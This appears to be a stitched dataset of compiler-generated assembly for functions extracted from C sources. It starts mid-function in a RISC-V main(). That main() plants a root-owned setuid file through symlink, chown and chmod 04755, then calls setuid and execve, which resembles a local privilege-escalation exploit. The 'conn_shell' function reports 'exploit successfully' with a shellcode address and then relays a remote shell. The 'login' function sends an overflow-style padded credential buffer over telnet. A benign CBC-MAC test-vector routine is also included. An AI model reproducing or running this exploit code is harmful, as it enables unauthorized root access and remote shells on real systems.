a1,s1 lla a0,.LC17 call readlink@plt blt a0,zero,.L22 .L4: li s2,4096 li s1,-4096 addi a0,s1,-8 addi a5,s2,160 add a5,a5,a0 lla a1,.LC15 add a0,a5,sp call symlink@plt addi a4,s2,160 mv a5,s2 add a4,a4,s1 addi s2,s1,-160 add s3,a4,sp addi a5,a5,160 add a5,a5,s2 ld a0,-152(s3) add s2,a5,sp mv a1,s2 call stat@plt bne a0,zero,.L5 lw a5,-160(s3) srli a5,a5,11 andi a5,a5,1 bne a5,zero,.L23 .L12: li a5,4096 addi s1,s1,-136 addi a5,a5,160 add a5,a5,s1 add s1,a5,sp .L6: call fork@plt beq a0,zero,.L24 .L9: lla a0,.LC26 call printf@plt lla s1,.LC27 .L10: li a0,1 call sleep@plt mv a0,s1 call printf@plt lw a0,4(s0) call fflush@plt j .L10 .L20: li a2,0 li a1,0 lla a0,.LC15 call chown@plt li a1,4096 addi a1,a1,-1555 lla a0,.LC15 call chmod@plt lla s0,.LANCHOR1 lw a0,0(s0) call exit@plt j .L3 .L24: li a2,-4096 li a5,4096 ld a0,0(s1) addi a2,a2,-48 addi a5,a5,160 add a5,a5,a2 add a2,a5,sp mv a1,s1 call execve@plt li a0,0 call exit@plt j .L9 .L5: mv a1,s2 lla a0,.LC20 call stat@plt beq a0,zero,.L25 ld a0,-136(s3) mv a1,s2 call stat@plt bne a0,zero,.L8 lw a5,-160(s3) srli a5,a5,11 andi a5,a5,1 beq a5,zero,.L8 lla a0,.LC24 call printf@plt j .L12 .L22: addi a2,s2,-1 mv a1,s1 lla a0,.LC18 call readlink@plt j .L4 .L23: lla a0,.LC19 call printf@plt li a5,4096 addi s1,s1,-152 addi a5,a5,160 add a5,a5,s1 add s1,a5,sp j .L6 .L25: lla a0,.LC21 call printf@plt lla a5,.LC22 lla a0,.LC23 sd a5,-24(s3) call getenv@plt li a5,4096 addi s1,s1,-112 addi a5,a5,160 add a5,a5,s1 sd a0,-104(s3) add s1,a5,sp j .L6 .L8: lla a0,.LC25 call printf@plt li a0,0 call exit@plt li s1,-4096 j .L12 .L21: call setuid@plt li a3,4096 li a5,-4096 addi a4,a3,160 add a4,a4,a5 add a4,a4,sp addi a5,a5,-80 ld a0,-80(a4) addi a4,a3,160 add a4,a4,a5 add a1,a4,sp li a2,0 mv s2,a3 call execve@plt addi a5,s2,152 add a5,a5,sp ld a4, 0(a5) ld a5, 0(s1) xor a5, a4, a5 li a4, 0 lw a0,0(s0) bne a5,zero,.L26 li t0,4096 add sp,sp,t0 ld ra,200(sp) ld s0,192(sp) ld s1,184(sp) ld s2,176(sp) ld s3,168(sp) addi sp,sp,208 jr ra .L26: call __stack_chk_fail@plt .size main, .-main .section .rodata.str1.8 .align 3 .LC0: .string "PATH=/tmp:/usr/bin:/usr/sbin:/sbin:/bin" .align 3 .LC1: .string "DBUS_STARTER_BUS_TYPE=system" .align 3 .LC2: .string "DBUS_SYSTEM_BUS_ADDRESS=autolaunch:" .globl stdout .globl errno .globl SIGKILL .globl g_aug_volatile_4145 .data .align 3 .set .LANCHOR0,. + 0 .type g_aug_volatile_4145, @object .size g_aug_volatile_4145, 4 g_aug_volatile_4145: .word 3 .zero 4 .LC11: .dword .LC0 .dword .LC1 .dword .LC2 .dword 0 .dword 0 .bss .align 2 .set .LANCHOR1,. + 0 .type errno, @object .size errno, 4 errno: .zero 4 .type stdout, @object .size stdout, 4 stdout: .zero 4 .type SIGKILL, @object .size SIGKILL, 4 SIGKILL: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_testmodes.c_test_cbcmac_aug_v3_5
.file "extr_testmodes.c_test_cbcmac_aug_v3_5.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "\203\033\347K\233\346\205\3108\342*%\243\021\313\024yb5\365(\230\320" .LC1: .string "\004\367\367xb\035\036,\206G\202*P\331\212\203" .LC2: .string "\360\361\211u\240\205\235\023\244\235=\277\306\315e\331" .LC3: .string "\305\205>k?~\365\020\223n0\325T\023_\rUC\222\214S\374/\201\243" .LC4: .string "\377\204Z\374Q\362\0065\244\217l\354\237x\037." .LC5: .string "\rj\023\217u\267V\224\325\025\305U^\356\335\222" .section .rodata .align 8 .LC6: .string "\006S_p\331l\200P\205k\002Og\256\207\336\310\322\235\253\267\037U\223Q" .string "\n<\217\374c`" .section .rodata.str1.1 .LC7: .string "\020w\026G#.\332@#\327\305\311\273Q.\223" .LC8: .string "\226\201=\261~\254\006\271yB\247:|Z\n\255" .LC9: .string "I\221\2635@\332M\212\337\3517K\264\341\305" .LC10: .string "[9\333K\244S\037\227\371\312K\335\355\233(S" .section .rodata .LC11: .string " \335\245\261\301\024" .string "\220\227A\357;\306\254\350\354" .section .rodata.str1.1 .LC12: .string "+\242\216\245b\335\234^\200\314\257\200\026w" .LC13: .string "\320\"\307\347\205\322\374\244\326\177\252\030\261\251\375\235zG7\t3C\0062" .LC14: .string "\300/\217\n\272\023Kk\026i\373X/\301\310v" .LC15: .string "\352\024\372\252\225H\022\313" .LC16: .string "\344Q\333&\216*&\321\277x>\253]\306\371?\262\305\342\\\350a(<" .LC17: .string "\005yK_\310\362\356\207t\315\210\237|)\353\240" .LC18: .string "d\004SL\250\n`\366^\"\266\304\327\363\2513\371>" .LC19: .string "\377F8\017b\2517\177\262A\210D9*\227\365\271\232\3007\371\306u?" .LC20: .string "j\024K\2529\366\031qbe\323NS\264\306|" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC21: .string "\224\261%cIIF~z\240\016\241\020%!\232\311\037\r\355\241\0200~\b\204\356\t\3501S\201" .section .rodata.str1.1 .LC22: .string "g\316Gl\021\016\241\274\360\2010+_\342;\2744\305MF\001\355I\004" .LC23: .string "\367\035\026\\\272\254\017\360\032\022u\370[j\216\025" .section .rodata.str1.8 .align 8 .LC24: .string "}\036~\031\232\324\364?\317\377U\367\311\201\346\023\300\"\253\177\203\222!reyx\315\360\2136" .align 8 .LC25: .string "\034P\300y|\326\177\211&\321\311\271\205\371\356\257\030?\007\013:\322_~\372\b\225\376\230\343C\221" .section .rodata.str1.1 .LC26: .string "\"\373~Lw\022|\355,\252\371\215\2375\025`" .section .rodata .align 8 .LC27: .string "\322\2438\032\202\326\266\302R\223C\035\334\035s\265\024\202@\376" .string "\303$R\215i\306\021NL\251@\315\373)\027" .section .rodata.str1.8 .align 8 .LC28: .string "<\036\256\247J\366\356C\233\327\243v8\326\b!`\346\033#+\370\244]\005\325\364\211\004>-\031" .section .rodata.str1.1 .LC29: .string "@\301\357\363\364qTXw<\323\007\226\337\375T" .LC30: .string "e\"\233w\025\345\002T\004\220\373\342\277Z\216\260\277d\377\177\267\253\177\030i{" .section .rodata.str1.8 .align 8 .LC31: .string "\302\332\001\264\022\245\315\034u\265\b_\322\356y\303G\331\371\022\206=\201\320B\211u\226XpG\005" .section .rodata.str1.1 .LC32: .string "i|e\225\242\037\242\372:\323`hz\355h7" .LC33: .string "\022\220\221e27\3205\366@B\247Oa\251\234\217\326\204\232\206\016W\347\344" .section .rodata.str1.8 .align 8 .LC34: .string "v\377\2638[\312|\223\300\022\327\274\263\243\320\362\207\247\n\2216v\247\215(G\005\216u\256^<" .section .rodata.str1.1 .LC35: .string "\365-e\026\204C\r\350\037)Q\006\354\360\245\322" .text .p2align 4 .type test_cbcmac, @function test_cbcmac: .LFB1: .cfi_startproc endbr64 subq $8, %rsp .cfi_def_cfa_offset 16 movl $23, %r9d leaq .LC0(%rip), %r8 movl $16, %ecx leaq .LC1(%rip), %rdx movl $16, %esi leaq .LC2(%rip), %rdi call cbcmac_vector@PLT movl $25, %r9d leaq .LC3(%rip), %r8 movl $16, %ecx leaq .LC4(%rip), %rdx movl $16, %esi leaq .LC5(%rip), %rdi call cbcmac_vector@PLT movl $32, %r9d leaq .LC6(%rip), %r8 movl $16, %ecx leaq .LC7(%rip), %rdx movl $16, %esi leaq .LC8(%rip), %rdi call cbcmac_vector@PLT movl $15, %r9d leaq .LC9(%rip), %r8 movl $16, %ecx leaq .LC10(%rip), %rdx movl $16, %esi leaq .LC11(%rip), %rdi call cbcmac_vector@PLT movl $14, %r9d leaq .LC12(%rip), %r8 movl $24, %ecx leaq .LC13(%rip), %rdx movl $16, %esi leaq .LC14(%rip), %rdi call cbcmac_vector@PLT movl $8, %r9d leaq .LC15(%rip), %r8 movl $24, %ecx leaq .LC16(%rip), %rdx movl $16, %esi leaq .LC17(%rip), %rdi call cbcmac_vector@PLT movl $18, %r9d leaq .LC18(%rip), %r8 movl $24, %ecx leaq .LC19(%rip), %rdx movl $16, %esi leaq .LC20(%rip), %rdi call cbcmac_vector@PLT movl $32, %r9d leaq .LC21(%rip), %r8 movl $24, %ecx leaq .LC22(%rip), %rdx movl $16, %esi leaq .LC23(%rip), %rdi call cbcmac_vector@PLT movl $31, %r9d leaq .LC24(%rip), %r8 movl $32, %ecx leaq .LC25(%rip), %rdx movl $16, %esi leaq .LC26(%rip), %rdi call cbcmac_vector@PLT movl $36, %r9d leaq .LC27(%rip), %r8 movl $32, %ecx leaq .LC28(%rip), %rdx movl $16, %esi leaq .LC29(%rip), %rdi call cbcmac_vector@PLT movl $26, %r9d leaq .LC30(%rip), %r8 movl $32, %ecx leaq .LC31(%rip), %rdx movl $16, %esi leaq .LC32(%rip), %rdi call cbcmac_vector@PLT movl $25, %r9d addq $8, %rsp .cfi_def_cfa_offset 8 leaq .LC33(%rip), %r8 movl $32, %ecx leaq .LC34(%rip), %rdx movl $16, %esi leaq .LC35(%rip), %rdi jmp cbcmac_vector@PLT .cfi_endproc .LFE1: .size test_cbcmac, .-test_cbcmac .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_testmodes.c_test_cbcmac_aug_v3_5.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "\203\033\347K\233\346\205\3108\342*%\243\021\313\024yb5\365(\230\320" .align 3 .LC1: .string "\004\367\367xb\035\036,\206G\202*P\331\212\203" .align 3 .LC2: .string "\360\361\211u\240\205\235\023\244\235=\277\306\315e\331" .align 3 .LC3: .string "\305\205>k?~\365\020\223n0\325T\023_\rUC\222\214S\374/\201\243" .align 3 .LC4: .string "\377\204Z\374Q\362\0065\244\217l\354\237x\037." .align 3 .LC5: .string "\rj\023\217u\267V\224\325\025\305U^\356\335\222" .align 3 .LC7: .string "\020w\026G#.\332@#\327\305\311\273Q.\223" .align 3 .LC8: .string "\226\201=\261~\254\006\271yB\247:|Z\n\255" .align 3 .LC9: .string "I\221\2635@\332M\212\337\3517K\264\341\305" .align 3 .LC10: .string "[9\333K\244S\037\227\371\312K\335\355\233(S" .align 3 .LC12: .string "+\242\216\245b\335\234^\200\314\257\200\026w" .align 3 .LC13: .string "\320\"\307\347\205\322\374\244\326\177\252\030\261\251\375\235zG7\t3C\0062" .align 3 .LC14: .string "\300/\217\n\272\023Kk\026i\373X/\301\310v" .align 3 .LC15: .string "\352\024\372\252\225H\022\313" .align 3 .LC16: .string "\344Q\333&\216*&\321\277x>\253]\306\371?\262\305\342\\\350a(<" .align 3 .LC17: .string "\005yK_\310\362\356\207t\315\210\237|)\353\240" .align 3 .LC18: .string "d\004SL\250\n`\366^\"\266\304\327\363\2513\371>" .align 3 .LC19: .string "\377F8\017b\2517\177\262A\210D9*\227\365\271\232\3007\371\306u?" .align 3 .LC20: .string "j\024K\2529\366\031qbe\323NS\264\306|" .align 3 .LC21: .string "\224\261%cIIF~z\240\016\241\020%!\232\311\037\r\355\241\0200~\b\204\356\t\3501S\201" .align 3 .LC22: .string "g\316Gl\021\016\241\274\360\2010+_\342;\2744\305MF\001\355I\004" .align 3 .LC23: .string "\367\035\026\\\272\254\017\360\032\022u\370[j\216\025" .align 3 .LC24: .string "}\036~\031\232\324\364?\317\377U\367\311\201\346\023\300\"\253\177\203\222!reyx\315\360\2136" .align 3 .LC25: .string "\034P\300y|\326\177\211&\321\311\271\205\371\356\257\030?\007\013:\322_~\372\b\225\376\230\343C\221" .align 3 .LC26: .string "\"\373~Lw\022|\355,\252\371\215\2375\025`" .align 3 .LC28: .string "<\036\256\247J\366\356C\233\327\243v8\326\b!`\346\033#+\370\244]\005\325\364\211\004>-\031" .align 3 .LC29: .string "@\301\357\363\364qTXw<\323\007\226\337\375T" .align 3 .LC30: .string "e\"\233w\025\345\002T\004\220\373\342\277Z\216\260\277d\377\177\267\253\177\030i{" .align 3 .LC31: .string "\302\332\001\264\022\245\315\034u\265\b_\322\356y\303G\331\371\022\206=\201\320B\211u\226XpG\005" .align 3 .LC32: .string "i|e\225\242\037\242\372:\323`hz\355h7" .align 3 .LC33: .string "\022\220\221e27\3205\366@B\247Oa\251\234\217\326\204\232\206\016W\347\344" .align 3 .LC34: .string "v\377\2638[\312|\223\300\022\327\274\263\243\320\362\207\247\n\2216v\247\215(G\005\216u\256^<" .align 3 .LC35: .string "\365-e\026\204C\r\350\037)Q\006\354\360\245\322" .text .align 1 .type test_cbcmac, @function test_cbcmac: addi sp,sp,-16 li a5,23 lla a4,.LC0 li a3,16 lla a2,.LC1 li a1,16 lla a0,.LC2 sd ra,8(sp) call cbcmac_vector@plt li a5,25 lla a4,.LC3 li a3,16 lla a2,.LC4 li a1,16 lla a0,.LC5 call cbcmac_vector@plt li a5,32 lla a4,.LANCHOR0 li a3,16 lla a2,.LC7 li a1,16 lla a0,.LC8 call cbcmac_vector@plt li a5,15 lla a4,.LC9 li a3,16 lla a2,.LC10 li a1,16 lla a0,.LANCHOR0+40 call cbcmac_vector@plt li a5,14 lla a4,.LC12 li a3,24 lla a2,.LC13 li a1,16 lla a0,.LC14 call cbcmac_vector@plt li a5,8 lla a4,.LC15 li a3,24 lla a2,.LC16 li a1,16 lla a0,.LC17 call cbcmac_vector@plt li a5,18 lla a4,.LC18 li a3,24 lla a2,.LC19 li a1,16 lla a0,.LC20 call cbcmac_vector@plt li a5,32 lla a4,.LC21 li a3,24 lla a2,.LC22 li a1,16 lla a0,.LC23 call cbcmac_vector@plt li a5,31 lla a4,.LC24 li a3,32 lla a2,.LC25 li a1,16 lla a0,.LC26 call cbcmac_vector@plt li a5,36 lla a4,.LANCHOR0+64 li a3,32 lla a2,.LC28 li a1,16 lla a0,.LC29 call cbcmac_vector@plt li a5,26 lla a4,.LC30 li a3,32 lla a2,.LC31 li a1,16 lla a0,.LC32 call cbcmac_vector@plt ld ra,8(sp) li a5,25 lla a4,.LC33 li a3,32 lla a2,.LC34 li a1,16 lla a0,.LC35 addi sp,sp,16 tail cbcmac_vector@plt .size test_cbcmac, .-test_cbcmac .section .rodata .align 3 .set .LANCHOR0,. + 0 .LC6: .string "\006S_p\331l\200P\205k\002Og\256\207\336\310\322\235\253\267\037U\223Q" .string "\n<\217\374c`" .zero 7 .LC11: .string " \335\245\261\301\024" .string "\220\227A\357;\306\254\350\354" .zero 7 .LC27: .string "\322\2438\032\202\326\266\302R\223C\035\334\035s\265\024\202@\376" .string "\303$R\215i\306\021NL\251@\315\373)\027" .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_22975.c_conn_shell_aug_v3_1
.file "extr_22975.c_conn_shell_aug_v3_1.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string " [*] Send, command packet !\n\n" .LC1: .string " [-] exploit failure.\n\n" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC2: .string " [*] exploit successfully ! (&shellcode_addr: %p)\n\n" .section .rodata.str1.1 .LC3: .string "%s" .LC4: .string "exit" .text .p2align 4 .globl conn_shell .type conn_shell, @function conn_shell: .LFB1: .cfi_startproc endbr64 pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 movq %rsp, %rbp .cfi_def_cfa_register 6 pushq %r15 pushq %r14 pushq %r13 pushq %r12 .cfi_offset 15, -24 .cfi_offset 14, -32 .cfi_offset 13, -40 .cfi_offset 12, -48 movl %edi, %r12d pushq %rbx subq $40, %rsp .cfi_offset 3, -56 movq %rsi, -80(%rbp) movq %rsp, %rcx movq %fs:40, %rax movq %rax, -56(%rbp) movl NRL(%rip), %eax movl %eax, -72(%rbp) movslq GET_R(%rip), %rax movq %rax, %r15 addq $15, %rax movq %rax, %rdx andq $-4096, %rax subq %rax, %rcx andq $-16, %rdx cmpq %rcx, %rsp je .L3 .L31: subq $4096, %rsp orq $0, 4088(%rsp) cmpq %rcx, %rsp jne .L31 .L3: andl $4095, %edx subq %rdx, %rsp testq %rdx, %rdx jne .L32 movl t_g(%rip), %eax movq %rsp, %r13 cmpl $5, %eax jle .L33 .L5: subl $6, %eax xorl %r14d, %r14d cmpl $3, %eax cmovb DEF_COMM_OB(%rip), %r14 .L7: movl -72(%rbp), %esi movl %r15d, %edx movq %r13, %rdi subl $1, %r15d call memset@PLT movl stdout(%rip), %edi leaq .LC0(%rip), %rsi xorl %eax, %eax call fprintf@PLT movl NRL(%rip), %ebx movq %r14, %rdi call strlen@PLT movq %r14, %rsi movl %r12d, %edi leal 1(%r12), %r14d movl %ebx, %ecx movl %eax, %edx leaq -60(%rbp), %rbx call send@PLT .p2align 4,,10 .p2align 3 .L12: movl stdout(%rip), %edi call fflush@PLT movq %rbx, %rdi call FD_ZERO@PLT movq %rbx, %rsi movl %r12d, %edi call FD_SET@PLT movl STDIN_FILENO(%rip), %edi movq %rbx, %rsi call FD_SET@PLT xorl %r8d, %r8d xorl %ecx, %ecx xorl %edx, %edx movq %rbx, %rsi movl %r14d, %edi call select@PLT movq %rbx, %rsi movl %r12d, %edi call FD_ISSET@PLT testq %rax, %rax je .L9 movl %r15d, %edx movq %r13, %rsi movl %r12d, %edi call read@PLT movslq %eax, %rcx movl NRL(%rip), %eax cmpl %ecx, %eax jl .L10 movl -72(%rbp), %eax testl %eax, %eax je .L34 movq -80(%rbp), %rdx movl stdout(%rip), %edi xorl %eax, %eax movl %ecx, -68(%rbp) leaq .LC2(%rip), %rsi call fprintf@PLT movl NRL(%rip), %edi call exit@PLT movl NRL(%rip), %eax movslq -68(%rbp), %rcx .L10: movl stdout(%rip), %edi movb %al, 0(%r13,%rcx) xorl %eax, %eax movq %r13, %rdx leaq .LC3(%rip), %rsi call fprintf@PLT .L9: movl STDIN_FILENO(%rip), %edi movq %rbx, %rsi call FD_ISSET@PLT testq %rax, %rax je .L12 movl STDIN_FILENO(%rip), %edi movl %r15d, %edx movq %r13, %rsi call read@PLT movl %eax, %edx movl NRL(%rip), %eax cmpl %edx, %eax jge .L12 movslq %edx, %rcx movq %r13, %rdi leaq .LC4(%rip), %rsi movl %edx, -68(%rbp) movb %al, 0(%r13,%rcx) call strstr@PLT movl -68(%rbp), %edx movq %r13, %rsi movl %r12d, %edi testq %rax, %rax movl -72(%rbp), %eax cmovne SCS(%rip), %eax movl %eax, -72(%rbp) call write@PLT jmp .L12 .L33: xorl %r14d, %r14d testl %eax, %eax cmovns DEF_COMM(%rip), %r14 jmp .L7 .p2align 4,,10 .p2align 3 .L34: movl stderr(%rip), %edi xorl %eax, %eax leaq .LC1(%rip), %rsi call fprintf@PLT movq -56(%rbp), %rax subq %fs:40, %rax jne .L35 leaq -40(%rbp), %rsp popq %rbx popq %r12 popq %r13 popq %r14 popq %r15 popq %rbp .cfi_remember_state .cfi_def_cfa 7, 8 ret .L32: .cfi_restore_state orq $0, -8(%rsp,%rdx) movl t_g(%rip), %eax movq %rsp, %r13 cmpl $5, %eax jg .L5 jmp .L33 .L35: call __stack_chk_fail@PLT .cfi_endproc .LFE1: .size conn_shell, .-conn_shell .globl t_g .bss .align 4 .type t_g, @object .size t_g, 4 t_g: .zero 4 .globl stdout .align 4 .type stdout, @object .size stdout, 4 stdout: .zero 4 .globl stderr .align 4 .type stderr, @object .size stderr, 4 stderr: .zero 4 .globl STDIN_FILENO .align 4 .type STDIN_FILENO, @object .size STDIN_FILENO, 4 STDIN_FILENO: .zero 4 .globl SCS .align 4 .type SCS, @object .size SCS, 4 SCS: .zero 4 .globl NRL .align 4 .type NRL, @object .size NRL, 4 NRL: .zero 4 .globl GET_R .align 4 .type GET_R, @object .size GET_R, 4 GET_R: .zero 4 .globl DEF_COMM_OB .align 8 .type DEF_COMM_OB, @object .size DEF_COMM_OB, 8 DEF_COMM_OB: .zero 8 .globl DEF_COMM .align 8 .type DEF_COMM, @object .size DEF_COMM, 8 DEF_COMM: .zero 8 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_22975.c_conn_shell_aug_v3_1.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string " [*] Send, command packet !\n\n" .align 3 .LC1: .string " [-] exploit failure.\n\n" .align 3 .LC2: .string " [*] exploit successfully ! (&shellcode_addr: %p)\n\n" .align 3 .LC3: .string "%s" .align 3 .LC4: .string "exit" .text .align 1 .globl conn_shell .type conn_shell, @function conn_shell: addi sp,sp,-144 sd s0,128(sp) sd s2,112(sp) sd s3,104(sp) sd s4,96(sp) sd s6,80(sp) sd s8,64(sp) sd s9,56(sp) addi s0,sp,144 sd ra,136(sp) sd s1,120(sp) sd s5,88(sp) sd s7,72(sp) sd s10,48(sp) sd s11,40(sp) lla s2,.LANCHOR0 lw s6,4(s2) la a3,__stack_chk_guard lw a5,8(s2) addi a4,s6,15 andi a4,a4,-16 sub sp,sp,a4 ld a4, 0(a3) sd a4, -120(s0) li a4, 0 li a4,5 lw s8,0(s2) mv s3,a0 mv s9,a1 mv s4,sp bgt a5,a4,.L2 blt a5,zero,.L4 ld s1,16(s2) .L4: mv a2,s6 mv a1,s8 mv a0,s4 call memset@plt lw a0,32(s2) lla a1,.LC0 addiw s5,s3,1 call fprintf@plt mv a0,s1 call strlen@plt lw a3,0(s2) mv a2,a0 mv a1,s1 mv a0,s3 call send@plt addiw s6,s6,-1 addi s1,s0,-124 lla s7,.LC3 lla s10,.LC2 .L9: lw a0,32(s2) call fflush@plt mv a0,s1 call FD_ZERO@plt mv a1,s1 mv a0,s3 call FD_SET@plt lw a0,36(s2) mv a1,s1 call FD_SET@plt mv a1,s1 li a4,0 li a3,0 li a2,0 mv a0,s5 call select@plt mv a1,s1 mv a0,s3 call FD_ISSET@plt beq a0,zero,.L6 mv a2,s6 mv a1,s4 mv a0,s3 call read@plt lw a4,0(s2) mv s11,a0 blt a4,a0,.L7 beq s8,zero,.L27 lw a0,32(s2) mv a2,s9 mv a1,s10 call fprintf@plt lw a0,0(s2) call exit@plt lw a4,0(s2) .L7: lw a0,32(s2) add a5,s4,s11 mv a2,s4 mv a1,s7 sb a4,0(a5) call fprintf@plt .L6: lw a0,36(s2) mv a1,s1 call FD_ISSET@plt beq a0,zero,.L9 lw a0,36(s2) mv a2,s6 mv a1,s4 call read@plt lw a5,0(s2) bge a5,a0,.L9 add a4,s4,a0 sd a0,-136(s0) lla a1,.LC4 mv a0,s4 sb a5,0(a4) call strstr@plt ld a2,-136(s0) beq a0,zero,.L11 lw s8,44(s2) .L11: mv a1,s4 mv a0,s3 call write@plt j .L9 .L2: addiw a5,a5,-6 li a4,2 bgtu a5,a4,.L4 ld s1,24(s2) j .L4 .L27: lw a0,40(s2) lla a1,.LC1 call fprintf@plt la a5,__stack_chk_guard ld a4, -120(s0) ld a5, 0(a5) xor a5, a4, a5 li a4, 0 bne a5,zero,.L28 addi sp,s0,-144 ld ra,136(sp) ld s0,128(sp) ld s1,120(sp) ld s2,112(sp) ld s3,104(sp) ld s4,96(sp) ld s5,88(sp) ld s6,80(sp) ld s7,72(sp) ld s8,64(sp) ld s9,56(sp) ld s10,48(sp) ld s11,40(sp) addi sp,sp,144 jr ra .L28: call __stack_chk_fail@plt .size conn_shell, .-conn_shell .globl t_g .globl stdout .globl stderr .globl STDIN_FILENO .globl SCS .globl NRL .globl GET_R .globl DEF_COMM_OB .globl DEF_COMM .bss .align 3 .set .LANCHOR0,. + 0 .type NRL, @object .size NRL, 4 NRL: .zero 4 .type GET_R, @object .size GET_R, 4 GET_R: .zero 4 .type t_g, @object .size t_g, 4 t_g: .zero 4 .zero 4 .type DEF_COMM, @object .size DEF_COMM, 8 DEF_COMM: .zero 8 .type DEF_COMM_OB, @object .size DEF_COMM_OB, 8 DEF_COMM_OB: .zero 8 .type stdout, @object .size stdout, 4 stdout: .zero 4 .type STDIN_FILENO, @object .size STDIN_FILENO, 4 STDIN_FILENO: .zero 4 .type stderr, @object .size stderr, 4 stderr: .zero 4 .type SCS, @object .size SCS, 4 SCS: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_89.c_login_aug_v3_5
.file "extr_89.c_login_aug_v3_5.c" .text .section .rodata .LC0: .string "xie\r\n" .string "" .section .rodata.str1.1,"aMS",@progbits,1 .LC1: .string "[*] sending username \n" .LC2: .string "[*] sending password\n" .section .rodata .LC3: .string "\r\n" .string "" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC4: .string "Connection closed by foreign host.\n" .section .rodata.str1.1 .LC5: .string "%s" .text .p2align 4 .globl login .type login, @function login: .LFB0: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 movl $172, %edx xorl %esi, %esi leaq .LC4(%rip), %r15 pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 leaq .LC5(%rip), %r14 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 movl %edi, %ebp pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 subq $1240, %rsp .cfi_def_cfa_offset 1296 movq %fs:40, %rax movq %rax, 1224(%rsp) xorl %eax, %eax leaq 16(%rsp), %r13 leaq 12(%rsp), %rbx movq %r13, %rdi leaq 192(%rsp), %r12 call memset@PLT movl $65, %esi movl $-16449, %eax leaq 23(%rsp), %rdi movl $150, %edx movb $48, 15(%rsp) movl $-2, 16(%rsp) movw %ax, 20(%rsp) movb $-61, 22(%rsp) call memset@PLT movl $-11083, %edx movl $2, %edi movw %dx, 173(%rsp) call sleep@PLT movl $1024, %edx xorl %esi, %esi movq %r12, %rdi call memset@PLT leaq .LC0(%rip), %rsi movq %r12, %rdi call strcpy@PLT leaq .LC1(%rip), %rdi call printf@PLT movq %r12, %rdi call strlen@PLT movq %r12, %rsi movl %ebp, %edi movl %eax, %edx call sendstr@PLT movl $1, %edi call sleep@PLT leaq .LC2(%rip), %rdi call printf@PLT movl $2, %edi call sleep@PLT movl $1024, %edx xorl %esi, %esi movq %r12, %rdi call memset@PLT movq %r13, %rsi movq %r12, %rdi leal 1(%rbp), %r13d call strcpy@PLT leaq .LC3(%rip), %rsi movq %r12, %rdi call strcat@PLT movq %r12, %rdi call strlen@PLT movq %r12, %rsi movl %ebp, %edi movl %eax, %edx call sendstr@PLT movl $2, %edi call sleep@PLT movl stdout(%rip), %edi call fflush@PLT movq %rbx, %rdi call FD_ZERO@PLT jmp .L4 .p2align 4,,10 .p2align 3 .L2: xorl %edi, %edi movq %rbx, %rsi call FD_ISSET@PLT testq %rax, %rax jne .L16 .L4: movq %rbx, %rsi movl %ebp, %edi call FD_SET@PLT xorl %edi, %edi movq %rbx, %rsi call FD_SET@PLT xorl %r8d, %r8d xorl %ecx, %ecx xorl %edx, %edx movq %rbx, %rsi movl %r13d, %edi call select@PLT movq %rbx, %rsi movl %ebp, %edi call FD_ISSET@PLT testq %rax, %rax je .L2 xorl %esi, %esi movl $1024, %edx movq %r12, %rdi call memset@PLT movl $1023, %edx movq %r12, %rsi movl %ebp, %edi call read@PLT testl %eax, %eax je .L17 .L3: movl stderr(%rip), %edi movq %r14, %rsi movq %r12, %rdx call fprintf@PLT xorl %edi, %edi movq %rbx, %rsi call FD_ISSET@PLT testq %rax, %rax je .L4 .L16: movl $1024, %edx xorl %esi, %esi movq %r12, %rdi call memset@PLT movl $1023, %edx movq %r12, %rsi xorl %edi, %edi call read@PLT movl %eax, %edx testl %eax, %eax jle .L4 movq %r12, %rsi movl %ebp, %edi call write@PLT jmp .L4 .p2align 4,,10 .p2align 3 .L17: movq %r15, %rdi call printf@PLT movl $-1, %edi call exit@PLT jmp .L3 .cfi_endproc .LFE0: .size login, .-login .globl stdout .bss .align 4 .type stdout, @object .size stdout, 4 stdout: .zero 4 .globl stderr .align 4 .type stderr, @object .size stderr, 4 stderr: .zero 4 .globl g_aug_volatile_9452 .data .align 4 .type g_aug_volatile_9452, @object .size g_aug_volatile_9452, 4 g_aug_volatile_9452: .long 3 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
